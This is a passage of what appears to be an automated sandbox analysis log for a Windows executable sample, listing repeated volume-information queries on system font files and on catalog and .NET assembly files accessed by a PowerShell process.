                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
